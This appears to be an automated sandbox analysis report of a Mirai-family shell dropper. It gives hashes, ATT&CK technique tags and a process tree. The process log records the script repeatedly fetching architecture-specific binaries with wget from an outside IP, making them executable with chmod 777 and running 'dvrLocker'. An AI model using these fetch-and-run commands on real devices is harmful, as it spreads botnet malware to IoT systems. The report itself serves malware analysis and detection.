Analysis
-
max time kernel
60s -
max time network
65s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system
submitted
09-11-2024 03:32
Static task
static1
Behavioral task
behavioral1
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
-
Size
923B
-
MD5
5419b553750dc94cb55eecefce2e1950
-
SHA1
bf1c8a80bcecfe13f81279a0392031d661e736ef
-
SHA256
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
-
SHA512
fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid  process
873  chmod
878  chmod
884  chmod
889  chmod
924  chmod
944  chmod
979  chmod
894  chmod
899  chmod
904  chmod
913  chmod
953  chmod
962  chmod
974  chmod
984  chmod
816  chmod
826  chmod
834  chmod
860  chmod
935  chmod
969  chmod
850  chmod
867  chmod
989  chmod
Executes dropped EXE 24 IoCs
Processes:
ioc                 pid  process
/tmp/lib/dvrLocker  818  dvrLocker
/tmp/lib/dvrLocker  827  dvrLocker
/tmp/lib/dvrLocker  836  dvrLocker
/tmp/lib/dvrLocker  852  dvrLocker
/tmp/lib/dvrLocker  862  dvrLocker
/tmp/lib/dvrLocker  868  dvrLocker
/tmp/lib/dvrLocker  874  dvrLocker
/tmp/lib/dvrLocker  879  dvrLocker
/mnt/dvrLocker      885  dvrLocker
/mnt/dvrLocker      890  dvrLocker
/mnt/dvrLocker      895  dvrLocker
/mnt/dvrLocker      900  dvrLocker
/mnt/dvrLocker      905  dvrLocker
/mnt/dvrLocker      915  dvrLocker
/mnt/dvrLocker      925  dvrLocker
/mnt/dvrLocker      936  dvrLocker
/mnt/dvrLocker      945  dvrLocker
/mnt/dvrLocker      954  dvrLocker
/mnt/dvrLocker      963  dvrLocker
/mnt/dvrLocker      970  dvrLocker
/mnt/dvrLocker      975  dvrLocker
/mnt/dvrLocker      980  dvrLocker
/mnt/dvrLocker      985  dvrLocker
/mnt/dvrLocker      990  dvrLocker
Processes:
description              ioc                process
File opened for reading  /proc/filesystems  ls
File opened for reading  /proc/filesystems  mkdir
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid  process
892  rm
949  wget
957  rm
821  wget
829  rm
888  wget
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description                   ioc                 process
File opened for modification  /tmp/lib/dvrLocker  becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes
-
PID:696  /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh  /tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh  [Writes file to tmp directory]
  PID:700  /bin/ls  ls -l /proc/1/exe  [Reads runtime system information]
  PID:706  /bin/ls  ls -l /proc/10/exe  [Reads runtime system information]
  PID:709  /bin/ls  ls -l /proc/105/exe  [Reads runtime system information]
  PID:712  /bin/ls  ls -l /proc/11/exe  [Reads runtime system information]
  PID:715  /bin/ls  ls -l /proc/115/exe  [Reads runtime system information]
  PID:718  /bin/ls  ls -l /proc/116/exe  [Reads runtime system information]
  PID:722  /bin/ls  ls -l /proc/12/exe
  PID:725  /bin/ls  ls -l /proc/13/exe  [Reads runtime system information]
  PID:726  /bin/ls  ls -l /proc/14/exe  [Reads runtime system information]
  PID:728  /bin/ls  ls -l /proc/142/exe  [Reads runtime system information]
  PID:730  /bin/ls  ls -l /proc/149/exe  [Reads runtime system information]
  PID:731  /bin/ls  ls -l /proc/15/exe  [Reads runtime system information]
  PID:734  /bin/ls  ls -l /proc/16/exe  [Reads runtime system information]
  PID:736  /bin/ls  ls -l /proc/166/exe  [Reads runtime system information]
  PID:737  /bin/ls  ls -l /proc/17/exe  [Reads runtime system information]
  PID:739  /bin/ls  ls -l /proc/18/exe  [Reads runtime system information]
  PID:740  /bin/ls  ls -l /proc/19/exe  [Reads runtime system information]
  PID:741  /bin/ls  ls -l /proc/2/exe  [Reads runtime system information]
  PID:743  /bin/ls  ls -l /proc/20/exe  [Reads runtime system information]
  PID:744  /bin/ls  ls -l /proc/21/exe  [Reads runtime system information]
  PID:745  /bin/ls  ls -l /proc/22/exe  [Reads runtime system information]
  PID:746  /bin/ls  ls -l /proc/23/exe  [Reads runtime system information]
  PID:747  /bin/ls  ls -l /proc/239/exe
  PID:748  /bin/ls  ls -l /proc/24/exe  [Reads runtime system information]
  PID:749  /bin/ls  ls -l /proc/3/exe  [Reads runtime system information]
  PID:750  /bin/ls  ls -l /proc/323/exe  [Reads runtime system information]
  PID:751  /bin/ls  ls -l /proc/326/exe  [Reads runtime system information]
  PID:752  /bin/ls  ls -l /proc/328/exe  [Reads runtime system information]
  PID:753  /bin/ls  ls -l /proc/330/exe  [Reads runtime system information]
  PID:754  /bin/ls  ls -l /proc/334/exe  [Reads runtime system information]
  PID:755  /bin/ls  ls -l /proc/36/exe  [Reads runtime system information]
  PID:756  /bin/ls  ls -l /proc/37/exe  [Reads runtime system information]
  PID:757  /bin/ls  ls -l /proc/374/exe
  PID:758  /bin/ls  ls -l /proc/376/exe  [Reads runtime system information]
  PID:759  /bin/ls  ls -l /proc/386/exe  [Reads runtime system information]
  PID:760  /bin/ls  ls -l /proc/390/exe  [Reads runtime system information]
  PID:761  /bin/ls  ls -l /proc/4/exe  [Reads runtime system information]
  PID:762  /bin/ls  ls -l /proc/486/exe  [Reads runtime system information]
  PID:763  /bin/ls  ls -l /proc/491/exe  [Reads runtime system information]
  PID:764  /bin/ls  ls -l /proc/5/exe  [Reads runtime system information]
  PID:765  /bin/ls  ls -l /proc/532/exe  [Reads runtime system information]
  PID:766  /bin/ls  ls -l /proc/533/exe  [Reads runtime system information]
  PID:767  /bin/ls  ls -l /proc/6/exe  [Reads runtime system information]
  PID:768  /bin/ls  ls -l /proc/674/exe  [Reads runtime system information]
  PID:769  /bin/ls  ls -l /proc/688/exe  [Reads runtime system information]
  PID:770  /bin/ls  ls -l /proc/689/exe  [Reads runtime system information]
  PID:771  /bin/ls  ls -l /proc/69/exe  [Reads runtime system information]
  PID:772  /bin/ls  ls -l /proc/691/exe  [Reads runtime system information]
  PID:773  /bin/ls  ls -l /proc/693/exe  [Reads runtime system information]
  PID:774  /bin/ls  ls -l /proc/694/exe  [Reads runtime system information]
  PID:775  /bin/ls  ls -l /proc/695/exe  [Reads runtime system information]
  PID:776  /bin/ls  ls -l /proc/696/exe  [Reads runtime system information]
  PID:777  /bin/ls  ls -l /proc/698/exe  [Reads runtime system information]
  PID:778  /bin/ls  ls -l /proc/7/exe  [Reads runtime system information]
  PID:779  /bin/ls  ls -l /proc/70/exe  [Reads runtime system information]
  PID:780  /bin/ls  ls -l /proc/71/exe  [Reads runtime system information]
  PID:781  /bin/ls  ls -l /proc/72/exe  [Reads runtime system information]
  PID:782  /bin/ls  ls -l /proc/73/exe  [Reads runtime system information]
  PID:783  /bin/ls  ls -l /proc/74/exe  [Reads runtime system information]
  PID:784  /bin/ls  ls -l /proc/76/exe  [Reads runtime system information]
  PID:785  /bin/ls  ls -l /proc/77/exe  [Reads runtime system information]
  PID:788  /bin/ls  ls -l /proc/78/exe  [Reads runtime system information]
  PID:789  /bin/ls  ls -l /proc/79/exe  [Reads runtime system information]
  PID:791  /bin/ls  ls -l /proc/8/exe  [Reads runtime system information]
  PID:793  /bin/ls  ls -l /proc/82/exe  [Reads runtime system information]
  PID:795  /bin/ls  ls -l /proc/9/exe  [Reads runtime system information]
  PID:797  /bin/rm  rm -rf /tmp/lib/
  PID:798  /bin/rm  rm -rf /tmp/lib/dvrLocker
  PID:799  /bin/mkdir  mkdir /tmp/lib/  [Reads runtime system information]
  PID:801  /usr/bin/wget  wget http://45.202.35.91/tmpsl -O -
  PID:816  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:818  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:818  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:820  /bin/rm  rm -rf tmpsl
  PID:821  /usr/bin/wget  wget http://45.202.35.91/tmips -O -  [System Network Configuration Discovery]
  PID:826  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:827  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:827  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:829  /bin/rm  rm -rf tmips  [System Network Configuration Discovery]
  PID:830  /usr/bin/wget  wget http://45.202.35.91/tarm -O -
  PID:834  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:836  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:836  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:839  /bin/rm  rm -rf tarm
  PID:844  /usr/bin/wget  wget http://45.202.35.91/tarm5 -O -
  PID:850  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:852  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:852  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:854  /bin/rm  rm -rf tarm5
  PID:855  /usr/bin/wget  wget http://45.202.35.91/tppc -O -
  PID:860  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:862  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:862  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:864  /bin/rm  rm -rf tppc
  PID:865  /usr/bin/wget  wget http://45.202.35.91/tarm7 -O -
  PID:867  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:868  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:868  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:871  /bin/rm  rm -rf tarm7
  PID:872  /usr/bin/wget  wget http://45.202.35.91/x86 -O -
  PID:873  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:874  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:876  /bin/rm  rm -rf x86
  PID:877  /usr/bin/wget  wget http://45.202.35.91/tarm6 -O -
  PID:878  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:879  /tmp/lib/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:879  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:881  /bin/rm  rm -rf tarm6
  PID:882  /bin/rm  rm -rf /mnt/dvrLocker
  PID:883  /usr/bin/wget  wget http://45.202.35.91/tmpsl -O -
  PID:884  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:885  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:885  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:887  /bin/rm  rm -rf tmpsl
  PID:888  /usr/bin/wget  wget http://45.202.35.91/tmips -O -  [System Network Configuration Discovery]
  PID:889  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:890  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:890  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:892  /bin/rm  rm -rf tmips  [System Network Configuration Discovery]
  PID:893  /usr/bin/wget  wget http://45.202.35.91/tarm -O -
  PID:894  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:895  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:895  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:897  /bin/rm  rm -rf tarm
  PID:898  /usr/bin/wget  wget http://45.202.35.91/tarm5 -O -
  PID:899  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:900  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:900  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:902  /bin/rm  rm -rf tarm5
  PID:903  /usr/bin/wget  wget http://45.202.35.91/tppc -O -
  PID:904  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:905  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:905  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:908  /bin/rm  rm -rf tppc
  PID:910  /usr/bin/wget  wget http://45.202.35.91/tarm7 -O -
  PID:913  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:915  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:915  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:917  /bin/rm  rm -rf tarm7
  PID:919  /usr/bin/wget  wget http://45.202.35.91/x86 -O -
  PID:924  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:925  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:929  /bin/rm  rm -rf x86
  PID:930  /usr/bin/wget  wget http://45.202.35.91/tarm6 -O -
  PID:935  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:936  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:936  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:938  /bin/rm  rm -rf tarm6
  PID:940  /usr/bin/wget  wget http://45.202.35.91/tmpsl -O -
  PID:944  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:945  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:945  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:948  /bin/rm  rm -rf tmpsl
  PID:949  /usr/bin/wget  wget http://45.202.35.91/tmips -O -  [System Network Configuration Discovery]
  PID:953  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:954  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:954  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:957  /bin/rm  rm -rf tmips  [System Network Configuration Discovery]
  PID:959  /usr/bin/wget  wget http://45.202.35.91/tarm -O -
  PID:962  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:963  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:963  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:966  /bin/rm  rm -rf tarm
  PID:968  /usr/bin/wget  wget http://45.202.35.91/tarm5 -O -
  PID:969  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:970  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:970  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:972  /bin/rm  rm -rf tarm5
  PID:973  /usr/bin/wget  wget http://45.202.35.91/tppc -O -
  PID:974  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:975  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:975  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:977  /bin/rm  rm -rf tppc
  PID:978  /usr/bin/wget  wget http://45.202.35.91/tarm7 -O -
  PID:979  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:980  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:980  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:982  /bin/rm  rm -rf tarm7
  PID:983  /usr/bin/wget  wget http://45.202.35.91/x86 -O -
  PID:984  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:985  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:987  /bin/rm  rm -rf x86
  PID:988  /usr/bin/wget  wget http://45.202.35.91/tarm6 -O -
  PID:989  /bin/chmod  chmod 777 dvrLocker  [File and Directory Permissions Modification]
  PID:990  /mnt/dvrLocker  ./dvrLocker tplink.new  [Executes dropped EXE]
  PID:990  /bin/sh  /bin/sh ./dvrLocker tplink.new
  PID:992  /bin/rm  rm -rf tarm6
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
93KB
MD5
bb9275394716c60d1941432c7085ca13
SHA1
43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA256
3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512
047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d